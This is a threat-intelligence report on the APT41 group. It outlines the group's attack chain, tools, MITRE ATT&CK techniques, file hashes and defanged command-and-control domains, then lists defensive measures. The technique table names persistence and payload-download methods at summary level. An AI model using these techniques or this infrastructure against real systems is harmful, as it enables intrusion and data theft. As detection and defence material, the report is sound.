By Ismael Rocha: An advanced persistent threat(APT) works to access computer networks and systems without being detected or noticed. These threats, sometimes executed by a nation-state or a state-sponsored group, can steal private and secret information, damage IT systems and disrupt the functioning of vital systems. Defending against advanced persistent threats is a difficult task, as they act stealthily and their intrusions can be difficult to recognize.
Brazil is a country with a wide variety of economic sectors, such as: education/research, finance, health, government/military, retail, energy, communication, technology, among others. These sectors generate large sums of money for governments and organizations, consequently arousing the interest of advanced threat groups. Thus, it is possible to note the great increase in cyber attacks for financial gain, access to secret and confidential files or country disruption by cybercriminals.
Countries and segments targeted by APT41
The APT group is known for targeting various countries around the world. Some of the regions where the threat has already been active include Asia, Europe, North America and South America. Some of the countries that are known targets of APT41 include:
It's important to note that APT41 is a highly sophisticated and constantly evolving group, so the list may change over time. For this same reason, we stress that the list of target segments below may also change.
Threat mode of operation
The APT41 advanced threat group's attack chain can vary depending on the target and the specific objectives of the attack, but generally involves the following steps:
- Reconnaissance and information gathering: target research is carried out and information is gathered to understand the network infrastructure, technologies used and other relevant details;
- Delivery: a variety of techniques are used to deliver the malware or malicious payload to the organization's system or network, including phishing, spear phishing, malvertising, exploitation of vulnerabilities, among others;
- Exploitation: after the payload has been delivered, the group uses exploitation techniques to look for vulnerabilities in the organization's system or network in order to gain unauthorized access;
- Evasion of defenses: a presence is established on the organization's system or network, using evasion techniques to avoid detection;
- Lateral movement: the group moves laterally through the organization's system or network, looking for valuable information;
- Data exfiltration: APT41 collects and exfiltrates valuable data from the organization, including confidential information, intellectual property and other financial and strategic information;
- Persistence: APT41 maintains a persistent presence on the organization's system or network, allowing them to continue collecting information and carrying out malicious activities for an extended period;
- Impact and destruction: in some cases, APT41 can destroy data or carry out sabotage as part of its overall attack strategy.
It is important to note that the APT41 attack chain is highly sophisticated and constantly evolving, and may include other steps and/or variations depending on the target and the specific objectives of the attack.
Tools already used by APT41
It was identified that APT41 uses a variety of malware and tools, both public and exclusive to the group, to establish a foothold in the victim's environment, such as:
- ASPXSpy
- ACEHASH
- Beacon
- CHINACHOP
- COLDJAVA
- CRACKSHOT
- CROSSWALK
- DEADEYE
- DOWNTIME
- EASYNIGHT
- Gh0st
- HIGHNOON.LITE
- HIGHNOON.PASTEBOY
- HOTCHAI
- HKDOOR
- JUMPALL
- LATELUNCH
- LIFEBOAT
- LOWKEY
- njRAT
- POISONPLUG
- POISONPLUG.SHADOW
- POTROAST
- SAGEHIRE
- SOGU
- SWEETCANDLE
- TERA
- TIDYELF
- XDOOR
- WINTERLOVE
- ZXSHELL
TTPs - MITRE ATT&CK
| Tactics | Technique | Details |
| Defense Evasion Privilege Escalation | T1134 | APT41 used a BADPOTATO exploit obfuscated by ConfuserEx to abuse the named channel representation for NT AUTHORITY\SYSTEM local privilege escalation. |
| Persistence | T1098 | User accounts have been added to the User and Admin groups. |
| Command and Control | T1071 | APT41 used HTTP to download payloads for the CVE-2019-19781 and CVE-2020-10189 exploits. |
| Collection | T1560 | A RAR archive of files targeted for exfiltration has been created. |
| Defense Evasion Persistence | T1197 | APT41 used BITSAdmin to download and install payloads. |
| Persistence Privilege Escalation | T1547 | Initialization files for persistence have been created and modified. A registry key HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost has been added to establish persistence for Cobalt Strike. |
| Credential Access | T1110 | Password brute force attacks were carried out on the local administrator account. |
| Execution | T1059 | It took advantage of PowerShell to deploy malware families in victims' environments. |
| Impact | T1486 | Ransomware called Encryptor RaaS was used to encrypt files on the target systems and provide the user with a ransom note. |
| Privilege Escalation Persistence | T1546 | The APT41 took advantage of the grip keys to establish persistence. |
Indicators of Commitment (IoCs)
ISH Tecnologia handles a number of Indicators of Compromise collected through open and closed sources, as well as analysis carried out by the Heimdall security team. In view of this, below we list all the Indicators of Compromise (IOCs) related to the analysis of the artifact(s) in this report.
| Indicators of malicious artifact compromise/analyzed | |
| md5: | 04fb0ccf3ef309b1cd587f609ab0e81e |
| sha1: | 44260a1dfd92922a621124640015160e621f32d5 |
| sha256: | 993d14d00b1463519fea78ca65d8529663f487cd76b67b3fd35440bcdf7a8e31 |
| File name: | VirusShare_04fb0ccf3ef309b1cd587f609ab0e81e |
| Indicators of malicious artifact compromise/analyzed | |
| md5: | f8c89ccd8937f2b760e6706738210744 |
| sha1: | f3c222606f890573e6128fbeb389f37bd6f6bda3 |
| sha256: | 4aa6970cac04ace4a930de67d4c18106cf4004ba66670cfcdaa77a4c4821a213 |
| File name: | 24BJCTGH.exe |
| Indicators of malicious artifact compromise/analyzed | |
| md5: | 46a557fbdce734a6794b228df0195474 |
| sha1: | 41bac813ae07aef41436e8ad22d605f786f9e099 |
| sha256: | 42d138d0938494fd64e1e919707e7201e6675b1122bf30ab51b1ae26adaec921 |
| File name: | |
| Indicators of malicious artifact compromise/analyzed | |
| md5: | 77c60e5d2d99c3f63f2aea1773ed4653 |
| sha1: | ad77a34627192abdf32daa9208fbde8b4ebfb25c |
| sha256: | 7566558469ede04efc665212b45786a730055770f6ea8f924d8c1e324cae8691 |
| File name: | 7566558469ede04efc665212b45786a730055770f6ea8f924d8c1e324cae8691.vir |
| Indicators of malicious artifact compromise/analyzed | |
| md5: | 849ab91e93116ae420d2fe2136d24a87 |
| sha1: | 3f1dee370a155dc2e8fb15e776821d7697583c75 |
| sha256: | 7cd17fc948eb5fa398b8554fea036bdb3c0045880e03acbe532f4082c271e3c5 |
| File name: | file.exe.app.dll |
| Indicators of malicious artifact compromise/analyzed | |
| md5: | 36711896cfeb67f599305b590f195aec |
| sha1: | 1036a7088b060250bb66b6de91f0c6ac462dc24c |
| sha256: | 490c3e4af829e85751a44d21b25de1781cfe4961afdef6bb5759d9451f530994 |
| File name: | 490c3e4af829e85751a44d21b25de1781cfe4961afdef6bb5759d9451f530994.bin |
| Indicators of malicious artifact compromise/analyzed | |
| md5: | 7d51ea0230d4692eeedc2d5a4cd66d2d |
| sha1: | 5ee7c57dc84391f63eaa3824c53cc10eafc9e388 |
| sha256: | 63e8ed9692810d562adb80f27bb1aeaf48849e468bf5fd157bc83ca83139b6d7 |
| File name: | 63e8ed9692810d562adb80f27bb1aeaf48849e468bf5fd157bc83ca83139b6d7.bin |
| Indicators of malicious artifact compromise/analyzed | |
| md5: | a0a96138b57ee24eed31b652ddf60d4e |
| sha1: | 03de2118aac6f20786043c7ef0324ef01dcf4265 |
| sha256: | 79190925bd1c3fae65b0d11db40ac8e61fb9326ccfed9b7e09084b891089602d |
| File name: | 79190925bd1c3fae65b0d11db40ac8e61fb9326ccfed9b7e09084b891089602d.bin |
| Indicators of malicious artifact compromise/analyzed | |
| md5: | ba08b593250c3ca5c13f56e2ca97d85e |
| sha1: | adde0644a572ed593e8b0566698d4e3de0fefb8a |
| sha256: | c51c5bbc6f59407286276ce07f0f7ea994e76216e0abe34cbf20f1b1cbd9446d |
| File name: | c51c5bbc6f59407286276ce07f0f7ea994e76216e0abe34cbf20f1b1cbd9446d |
| Indicators of malicious artifact compromise/analyzed | |
| md5: | 37e100dd8b2ad8b301b130c2bca3f1ea |
| sha1: | 32466d8d232d7b1801f456fe336615e6fa5e6ffb |
| sha256: | 2eea29d83f485897e2bac9501ef000cc266ffe10019d8c529555a3435ac4aabd |
| File name: | TSMSISrv.DLL |
| Indicators of malicious artifact compromise/analyzed | |
| md5: | 557ff68798c71652db8a85596a4bab72 |
| sha1: | 971bb08196bba400b07cf213345f55ce0a6eedc8 |
| sha256: | 5d971ed3947597fbb7e51d806647b37d64d9fe915b35c7c9eaf79a37b82dab90 |
| File name: | TSMSISrv.DLL |
| Indicators of malicious artifact compromise/analyzed | |
| md5: | 830a09ff05eac9a5f42897ba5176a36a |
| sha1: | 2366d181a1697bcb4f368df397dd0533ab8b5d27 |
| sha256: | 70c03ce5c80aca2d35a5555b0532eedede24d4cc6bdb32a2c8f7e630bba5f26e |
| File name: | BARLAIY-70c03ce5c80aca2d35a5555b0532eedede24d4cc6bdb32a2c8f7e630bba5f26e |
| Indicators of malicious artifact compromise/analyzed | |
| md5: | 7d51ea0230d4692eeedc2d5a4cd66d2d |
| sha1: | 5ee7c57dc84391f63eaa3824c53cc10eafc9e388 |
| sha256: | 63e8ed9692810d562adb80f27bb1aeaf48849e468bf5fd157bc83ca83139b6d7 |
| File name: | 63e8ed9692810d562adb80f27bb1aeaf48849e468bf5fd157bc83ca83139b6d7.bin |
| Indicators of malicious artifact compromise/analyzed | |
| md5: | b0877494d36fab1f9f4219c3defbfb19 |
| sha1: | 4dc5fadece500ccd8cc49cfcf8a1b59baee3382a |
| sha256: | 3e6c4e97cc09d0432fbbbf3f3e424d4aa967d3073b6002305cd6573c47f0341f |
| File name: | TSMSISrv.DLL |
| Indicators of malicious artifact compromise/analyzed | |
| md5: | ff8d92dfbcda572ef97c142017eec658 |
| sha1: | 6f065eea36e28403d4d518b8e24bb7a915b612c3 |
| sha256: | f4d57acde4bc546a10cd199c70cdad09f576fdfe66a36b08a00c19ff6ae19661 |
| File name: | TSMSISrv.DLL |
| Indicators of malicious artifact compromise/analyzed | |
| md5: | ffd0f34739c1568797891b9961111464 |
| sha1: | 82072cb53416c89bfee95b239f9a90677a0848df |
| sha256: | 0055dfaccc952c99b1171ce431a02abfce5c6f8fb5dc39e4019b624a7d03bfcb |
| File name: | ma_lockdown_service.dll |
| Indicators of malicious artifact compromise/analyzed | |
| md5: | 97363d50a279492fda14cbab53429e75 |
| sha1: | f1a181d29b38dfe60d8ea487e8ed0ef30f064763 |
| sha256: | 462a02a8094e833fd456baf0a6d4e18bb7dab1a9f74d5f163a8334921a4ffde8 |
| File name: | nssock.dll |
| Indicators of malicious artifact compromise/analyzed | |
| md5: | 5e87b09f9a3f1b728c9797560a38764b |
| sha1: | 67c957c268c1e56cc8eb34b02e5c09eae62680f5 |
| sha256: | 354c174e583e968f0ecf86cc20d59ecd6e0f9d21800428453b8db63f344f0f22 |
| File name: | =?utf-8?B?5Lit5p2x5ZG85ZC45Zmo55eH5YCZ576kKE1FUlMp44Gu5LqI6ZiyLjd6?= |
Distribution URLs and C2 IP addresses:
| byeserver[.]com |
| dnsgogle[.]com |
| gamewushu[.]com |
| gxxservice[.]com |
| ibmupdate[.]com |
| infestexe[.]com |
| kasparsky[.]net |
| linux-update[.]net |
| macfee[.]ga |
| micros0ff[.]com |
| micros0tf[.]com |
| notped[.]com |
| operatingbox[.]com |
| paniesx[.]com |
| serverbye[.]com |
| sexyjapan.ddns[.]info |
| symanteclabs[.]com |
| techniciantext[.]com |
| win7update[.]net |
| xigncodeservice[.]com |
| agegamepay[.]com |
| ageofwuxia[.]com |
| ageofwuxia[.]info |
| ageofwuxia[.]net |
| ageofwuxia[.]org |
Note: The links and IP addresses listed above may be active; be careful when manipulating these IoCs to avoid clicking on them and becoming a victim of the malicious content hosted on the IoC.
How to protect yourself from the APT41 group
In addition to the indicators of compromise listed above by the ISH, measures can be adopted to mitigate the infection of the aforementioned to advanced persistent threats, such as:
- Keeping software up to date: it is important to keep the operating system, applications and security software up to date with the latest security updates. This helps to correct known vulnerabilities that can be exploited by APTs.
- Use multi-factor authentication: this can help protect against phishing attacks and stolen credentials. It adds an extra layer of security by requiring the user to provide additional information, in addition to a password, in order to authenticate.
- Do not download artifacts contained in suspicious emails and do not click on links in emails that appear to have malicious behavior.
- Use encryption: this can help protect sensitive information, such as customer and corporate data, from being accessed by APTs.
- Backing up regularly: cultivating this practice for critical data can help protect against data loss due to APT attacks.
- Implementing network security controls: such as firewalls, IDS/IPS and advanced threat detection, can help identify and block APTs before they can cause damage.
- Carry out security awareness training: this can help educate users about security threats and how to protect themselves against them.
- Perform behavior analysis: this can help detect suspicious activity within the network, such as transferring large amounts of data to unknown locations or attempting to access confidential resources outside of working hours.
- Adopt a company-wide security posture: to be effective against APTs it is important that companies adopt a comprehensive company-wide approach to security, including policies and procedures, security controls and regular security awareness training.
References
- Heimdall by ISH Tecnologia
- mandiant
- trendmicro
- hhs.gov